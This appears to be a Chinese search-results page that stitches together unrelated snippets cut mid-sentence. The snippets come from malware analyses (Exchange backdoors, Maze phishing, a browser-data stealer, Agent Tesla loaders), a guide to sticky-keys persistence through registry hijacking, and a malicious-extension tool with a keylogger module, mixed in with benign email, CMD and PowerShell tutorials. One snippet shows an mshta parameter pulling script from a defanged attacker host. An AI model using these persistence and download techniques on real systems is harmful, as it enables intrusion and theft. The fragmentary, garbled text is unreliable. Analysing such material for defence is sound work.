TriFive和Snugy后门本质上是PowerShell脚本,可以帮助攻击者访问被入侵的Exchange服务器,并使用不同的C2信道来进行通信。...攻击者使用这两个调度任务作为持久性方法,因为计划任务会反复运行这两个PowerShell脚本,不过运行的时间间隔不同。下图显示的是这两个任务及其相关的创建时间、运行间隔和执行的命令。...为了向后门发出命令,攻击者需要登录到同一个合法的电子邮件帐户并创建一个主题为555的电子邮件草稿,其中就包括了加密和Base64编码格式的命令。...下图显示的一封包含演示命令的邮件,主题为555,邮件内容为woFyeWt3cw==,该脚本将通过PowerShell执行: 为了运行攻击者提供的命令,PowerShell脚本需要登录到Exchange服务器上的合法电子邮件帐户...脚本将打开电子邮件草稿,并使用Base64解码电子邮件消息正文中的内容,然后通过从每个字符中减去10来解密解码命令内容。
附件是一个ZIP压缩文档,其中包含了一个批处理文件,它使用了UTF-16编码。...使用PowerShell命令,并下载一个PowerShell脚本以及PShellExec.exe; ? 3....通过使用PShellExec.exe,它首先会对下载下来的PowerShell脚本进行加密,然后删除原始脚本,并运行加密后的脚本; ? 4....最后,它会创建一个VBScript脚本,并执行加密后的PowerShell脚本。为了实现持久化感染,它还会在目标系统的启动目录STARTUP文件夹中创建一个符号链接; ?...分析PowerShell脚本 乍看之下,这个脚本貌似参考的是Matthew Graeber之前所开发的PowerShell脚本,即PowerSyringe,一个基于PowerShell的代码/DLL
恶意邮件正文为退税相关内容,并诱骗收件人在三天内应提交退款申请(使用附件Microsoft Word文档表单),这些电子邮件主要针对IT服务公司。 ?...打开Microsoft Word附件后,将执行Microsoft Office宏,进而执行PowerShell脚本,该脚本会将Maze勒索软件下载并安装到受害者的系统上。 ?...该邮件正文为执法活动通知,通知收货人打开并阅读随附文件,以避免进一步的税费和罚款。...这些电子邮件主要针对制造公司,攻击者将Microsoft Office宏的感染链用于PowerShell脚本中,该脚本最终下载并安装了Maze勒索软件。 ?...在2017年,这些活动集中于网络钓鱼和复杂的社会工程学以及银行木马和勒索软件,2018年,这些活动以税收为主题。
由于批处理文件使用的字符编码不同,默认情况下使用文本编辑器打开会显示不连贯的字符。这也是攻击者进行混淆的一种方式,使用正确的编码打开即可对脚本进行分析。...但在后台,Powershell 代码会使用 Invoke-WebRequest 从新注册的恶意域名(vuagame[.]store)下载多个文件。...4HAI.zip文件中包含另一个要复制到启动文件夹的恶意批处理脚本,该脚本会运行 PowerShell 代码并下载执行名为 project.py 的 Python 脚本。...与之前的批处理脚本一样,也需要更改编码才能正常查看该脚本。 将批处理脚本复制到启动文件夹后,将会下载并执行另一个名为 rmv.py 的 Python 脚本清除痕迹。...一旦数据被泄露,该脚本就会对创建的所有文件与文件夹进行清理。由于恶意批处理文件被放置在启动文件夹中,用户凭据与其他浏览器数据将会不断被收集回传。
恶意程序的多种多样,如 JavaScript、Windows 批处理文件或 Visual Basic 脚本。...脚本执行后,会通过下载服务器下载下一阶段的攻击载荷,攻击者将下载服务器部署在基于 Azure 的 Windows 服务器或基于 AWS 的 EC2 实例上。...△ 解密函数 紧接着继续解密: △ 解密函数 第二层 其余加密内容在第二层进行解密,将 ejv()解密的结果传递给解密函数。 去混淆的结果包含另一个解密函数 Ox$(),这是第三层解密函数。...△ VBScript Downloader 示例 PowerShell Dropper 在 Azure 的服务器上发现了一个使用 HCrypt 构建的 PowerShell 脚本。...攻击通过钓鱼邮件进行传播,电子邮件仍然是需要防范的重点位置。
“收件人”地址) 字符串形式的电子邮件正文 电子邮件正文字符串的开头必须是以'Subject: \n'开头的电子邮件主题行。'...\n'换行符将电子邮件的主题行与正文分开。 从sendmail()返回的值是一个字典。对于电子邮件传递失败的每个收件人,字典中都会有一个键值对。一个空字典意味着所有的收件人都成功发送了邮件。...您可以将列表参数中的多个 IMAP 搜索关键字字符串传递给search()方法。返回的消息是匹配所有搜索关键字的消息。如果您想要匹配任何搜索关键字,请使用OR搜索关键字。...您可以编写一个程序,使用ezgmail或smtplib模块发送这些电子邮件。电话号码和电话公司的电子邮件服务器构成了收件人的电子邮件地址。电子邮件的主题和正文将是文本消息的正文。...尽管 IMAP 比 SMTP 复杂一些,但它也非常强大,允许您搜索特定的电子邮件,下载它们,并解析它们以提取字符串值形式的主题和正文。
3.3 网络相关命令 3.4 批处理和脚本命令 四、CMD 的高级用法 4.1 命令的参数和选项 4.2 管道和重定向 4.3 批处理文件和脚本编写 五、CMD 的实际应用场景 5.1...call:调用另一个批处理文件或脚本。例如,call script.bat 将调用名为 "script.bat" 的批处理文件。 goto:跳转到指定的标签。...|:将命令的输出通过管道传递给另一个命令进行处理,如前面所述。 示例: dir > file.txt:将当前目录的文件列表输出到名为 "file.txt" 的文件中。...4.3 批处理文件和脚本编写 批处理文件和脚本是一种用于自动化执行一系列命令或任务的脚本文件。...六、CMD 的扩展工具和替代品 6.1 PowerShell 和其他替代品 PowerShell是一种功能强大的命令行壳程序和脚本语言,用于管理和自动化Windows操作系统。
目前Windows中的批处理包含两类:Windows DOS (BAT) 批处理和 PowerShell 批处理 DOS 批处理:基于Windows DOS命令的,用来自动地批量地执行DOS命令以实现特定操作的脚本...Windows bat(批处理)是一种用于 Windows 操作系统的脚本语言和命令行工具,它使用扩展名为 .bat 或 .cmd 的文件,其中包含一系列的命令和指令,用于自动化执行一组任务或操作。...包括但不限于文件和文件夹的创建、复制、删除、移动,运行程序和命令,设置环境变量,修改注册表等 除此之外,Windows bat 批处理脚本使用一种简单的命令语法,可以包含条件判断 if、循环 for、变量定义...rem echo 我是注释不执行1 :: echo 我是注释不执行2 == echo 我不是注释要执行 @pause call :调用另一个批处理文件 描述: 使用call命令调用其他批处理文件,如果不用...call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令,温馨提示:同一目录可以不加路径。
: powershell/lateral_movement/invoke_wmi_debugger) > execute#注意这里可以将sethc.exe替换为Utilman.exe(快捷键为: Win...粘性键持久性技术是众所周知的,一些攻击者者在网络攻击期间也常常使用它,除了上述的Metasploit和Empire之外,我们还可以使用脚本来自动执行此方法,Preston Thornburg编写了以下PowerShell...脚本,该脚本可以通过修改注册表来实现持久性$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution...\Image File Execution Options\sethc.exe之后五次shift,成功执行cmd:批处理文件2与批处理文件1方式类似,Sticky-Keys项目(https://github.com.../HanKooR/Sticky-Keys )提供了一个额外的选项,把系统控制台给用户,该工具的使用较为简单,下载批处理文件之后下目标主机执行即可虽然执行时可能会有一些小错误,但是执行结果没有任何问题,我们可以按下
之后连续按下5次"Shift"键,之后将弹出命令执行窗口,可以直接以System权限执行系统命令、创建管理员用户、登录服务等 ?...Powershell 粘性键持久性技术是众所周知的,一些攻击者者在网络攻击期间也常常使用它,除了上述的Metasploit和Empire之外,我们还可以使用脚本来自动执行此方法,Preston Thornburg...编写了以下PowerShell脚本,该脚本可以通过修改注册表来实现持久性 $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion...批处理文件2 与批处理文件1方式类似,Sticky-Keys项目(https://github.com/HanKooR/Sticky-Keys )提供了一个额外的选项,把系统控制台给用户,该工具的使用较为简单...,下载批处理文件之后下目标主机执行即可 ?
在过去的几个月里,Gamaredon 使用了许多不同的编程语言,从 C# 到 VBScript、批处理文件和 C/C++。...他们一直在以三种不同的方式使用此模块将恶意电子邮件发送到: 受害者通讯录中的每个人 同一组织内的每个人 预定义的目标列表 虽然在未经受害者同意的情况下滥用受感染的邮箱发送恶意电子邮件并不是一种新技术,但我们认为这是第一个公开记录的攻击组使用...如图 2 所示,VBA 代码构建电子邮件正文并将恶意文档附加到电子邮件中。我们已经看到.docx和.lnk文件都被用作附件。...VBScript 使用 Document.AttachedTemplate 属性将远程模板的引用注入现有文档 此 VBScript 模块还打包在一个自解压存档中,包含一个批处理文件和两个 VBS 文件,...C# 后门线程创建例程 批处理文件/VBScript 此版本包含多个脚本,以批处理文件形式和 VBScript 编写。但是,最终目标是相同的:扫描系统以查找敏感文档。
接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地: git clone https://github.com/Sh1n0g1/z9.git (向右滑动,查看更多) 然后切换到项目目录中,使用pip...工具和项目提供的requirements.txt安装该工具所需的其他依赖组件: cd z9 pip install -r requirements.txt (向右滑动,查看更多) 工具使用帮助...启用静态分析代码 --no-viewer 禁止在Web浏览器中打开JSON查看器 --utf8 以UTF-8编码读取脚本文件...参数解析: 参数命令 命令介绍 input file 要分析的PowerShell文件路径 -o output json 存储z9分析结果的文件名 -s 执行静态分析 --utf8 当输入文件编码为UTF...; 2、重启PC; 3、所有的PowerShell执行此时都会在事件日志中被记录; 将事件日志转储为XML 1、执行该批处理文件:https://github.com/Sh1n0g1/z9/blob/main
然而,批处理文件简化了重新输入命令的工作,节省了时间和避免了可能出现的不可逆转的错误。 你还可以使用 PowerShell 等其他工具编写更高级的脚本。...你只需要一个文本编辑器和一些基本的命令行知识。在下面的说明中,我们将讲述编写基本批处理文件的步骤、编写脚本以更改 Windows 10 上的系统设置的步骤。...在本例中,我们选择每月运行一个任务的选项,但是您可能需要根据需要配置其他参数。 点击下一步按钮 使用开始设置,确认开始运行任务的日期和时间 使用每月下拉菜单来选择一年中你想要运行任务的月份。...使用天或上下拉菜单来确认任务将运行的天。 点击下一步按钮 选择 启动程序 选项以运行批处理文件。 在程序或脚本字段中,单击 浏览 按钮 选择您创建的批处理文件,点击下一步按钮。...启动时运行批处理文件 如果你希望每次登录到 Windows 10 帐户时执行一系列命令,你可以将脚本放在启动文件夹中以保存额外的步骤,而不是使用任务计划程序。
【感染链】 HTA 文件解密 PowerShell 脚本,在执行 AES 解密和 GZIP 解压缩后解密并加载另一个 PowerShell 脚本。...函数写入磁盘,路径为C:\Users\\AppData\Roaming\MuUQDuaFNoGmHQE.exe: 【写入指定位置】 Agent Tesla 二进制文件的路径作为参数传递给...【恶意 INF 文件】 将 INF 文件写入临时目录后,PowerShell 代码会生成一个新进程 cmstp.exe,并以 /au $InfFileLocation作为参数,然后安装恶意 INF 文件...该脚本将 [ENTER] 按键发送到活动的窗口应用程序,以便使用 SendKeys.SendWait() 函数自动执行。...如果 Payload 的扩展名为 .dll,则它使用 rundll32.exe 将 DLL 加载到虚拟内存中。
通过工具分离lnk参数,结果如下: 指向路径: C:\Windows\system32\mshta.exe 传递参数: about:<script src='hxxp://neya-***.ru/config.ini...本文将以该案例为切入点,针对现有的非PE攻击手法进行分析与总结,内容包括<em>脚本</em>类型以及文档类型攻击,下面开始今天的<em>正文</em>。...<em>正文</em> 一、<em>脚本</em>攻击 1.JScript,VBScript还是<em>PowerShell</em>?...JScript,由微软开发的活动<em>脚本</em>语言,典型<em>脚本</em>后缀名.js VBScript,基于Visual Basic程序语言的<em>脚本</em>语言,典型<em>脚本</em>后缀名称.vbs <em>PowerShell</em>,可以认为是增强型CMD,...研究过程中, 我们观察到攻击者经常会通过<em>电子邮件</em>来进行传播大量包含了恶意文档的<em>电子邮件</em>,邮件内容是精心构造,以便诱导用户点击。
并且举例而言,cromos通过PowerShell创建可执行文件强制安装,并到云端更新文件来主持恶意文件。...cromos.py --extension {id} 下载扩展并载入模块 Usage: python cromos.py --extension {id} --load {currency/keylogger} 创建批处理文件并更新云端文件...模块 描述 模块/键盘侧录(keylogger) 在一个受感染的浏览器中,这个模块将捕获你输入的所有密码,不管是否基于 https 协议,你所需要的只是一个php服务器,用于接收请求的参数,即电子邮件地址...,密码,浏览器缓存(cookies)和用户代理程式识别码(userAgent)。...未经许可,对目标系统使用这段代码在大多数地区是非法的。对滥用这段信息和代码造成的损失,作者不承担任何赔偿责任。
您可以使用与配置元素内联的 job-xml 元素,利用配置参数将一个 XML 文件传递给 shell 作业。您可以配置其他文件或归档文件,让它们可用于 shell 作业。...您可以使用 Expression Language (EL) 表达式将参数分配给内联属性值。您必须以 Java属性文件的格式写入所有输出参数。...您可以添加其他的文件和归档文件,让它们可用于 Hive 作业。Oozie 执行了由脚本元素中的路径指定的 Hive 脚本。您可以通过 Oozie 工作流,将参数作为输入参数分配给 Hive 脚本。...除了主题和消息正文之外,电子邮件操作还必须拥有 to 和cc(可选)地址。您可以使用逗号分割的电子邮件地址向多个收件人发送电子邮件。...电子邮件操作可同步运行,而工作流作业一直要等到发送电子邮件之后才会触发下一个操作。您可以使用Hadoop EL 表达式将参数分配给电子邮件操作。 清单 14.
exe2hexbat是一个 Python 脚本,用于将 Windows PE 可执行文件转换为批处理文件,反之亦然。 概述 exe2hex 将可执行二进制文件编码为 ASCII 文本格式。...然后,将结果传输到目标计算机(回显 ASCII 文件比回显二进制数据容易得多)。执行exe2hex的输出文件后,使用或PowerShell(默认情况下在Windows上预安装)还原原始程序。...-x chao.exe 可以看到,exe2hex将exe文件转变成了cmd和bat文件。...-v #启用详细模式 主要用途: 将二进制程序转换为ASCII十六进制文件,可以使用内置的操作系统程序进行还原。 在旧版和新版本的 Windows 上工作,无需预安装任何第三方程序。...支持 x86 和 x64 操作系统。 可以使用 DEBUG.exe 或 PowerShell 来还原文件。 能够在转换之前压缩文件。 对输出进行 URL 编码。 向每行添加前缀和后缀文本的选项。
在对管道中的每个对象或所选对象执行操作的命令中,可以使用此变量。 $Args : 包含由未声明参数和/或传递给函数、脚本或脚本块的参数值组成的数组。...在通过 PSConsoleFile 参数启动 Windows PowerShell 或使用 Export-Console cmdlet 将管理单元名称导出到控制台文件 时,将填充此变量。...$Input : 一个枚举数,它包含传递给函数的输入。$Input 变量区分大小写,只能用于函数和脚本块。(脚本块本质上是未命名的函数。)...只有在声明参数的作用域(如脚本或函数)中, 此变量才有值。可以使用此变量显示或更改参数的当前值,也可以将参数值传递给 其他脚本或函数。...例如,ParameterSetName 属性包含正在使用的参数集的名称,而 ShouldProcess 方法将 WhatIf和 Confirm 参数动态添加到 cmdlet。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
